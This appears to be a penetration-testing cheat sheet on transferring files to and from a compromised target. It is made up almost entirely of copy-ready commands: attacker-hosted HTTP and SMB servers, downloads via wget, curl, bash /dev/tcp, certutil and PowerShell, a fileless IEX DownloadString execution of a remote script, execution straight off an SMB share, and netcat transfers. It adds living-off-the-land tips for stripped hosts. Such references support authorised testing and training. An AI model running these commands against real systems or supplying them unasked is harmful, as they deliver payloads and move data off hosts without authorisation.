File Transfers
Get files on and off a target across Linux and Windows: HTTP servers, certutil, SMB, base64 paste and nc, including living-off-the-land when tools are missing. Each payload is its own copy block.
Host a server (your box)
Python HTTP server:
python3 -m http.server 80PHP server (if python is missing):
php -S 0.0.0.0:80SMB server (great for Windows):
impacket-smbserver share . -smb2supportDownload to Linux
wget:
wget http://<YOUR_IP>/file -O /tmp/filecurl:
curl http://<YOUR_IP>/file -o /tmp/fileNo wget/curl, use bash /dev/tcp:
exec 3<>/dev/tcp/<YOUR_IP>/80; echo -e "GET /file HTTP/1.0\r\n\r\n" >&3; cat <&3 > /tmp/fileDownload to Windows
certutil:
certutil -urlcache -split -f http://<YOUR_IP>/file.exe file.exePowerShell Invoke-WebRequest:
Invoke-WebRequest http://<YOUR_IP>/file.exe -OutFile file.exePowerShell WebClient:
(New-Object Net.WebClient).DownloadFile('http://<YOUR_IP>/f.exe','f.exe')Fileless execute:
IEX(New-Object Net.WebClient).DownloadString('http://<YOUR_IP>/s.ps1')SMB transfer (Windows)
Copy off the share:
copy \\<YOUR_IP>\share\file.exe .Run directly off the share:
\\<YOUR_IP>\share\file.exebase64 copy-paste (no network path)
Encode on the source:
base64 -w0 fileDecode on the destination:
echo <BLOB> | base64 -d > filenc / netcat
Receiver:
nc -lvnp 4444 > fileSender:
nc <IP> 4444 < fileOn Windows targets
certutiland PowerShell are almost always present. On Linux, fall back to/dev/tcpandbase64when wget/curl are stripped.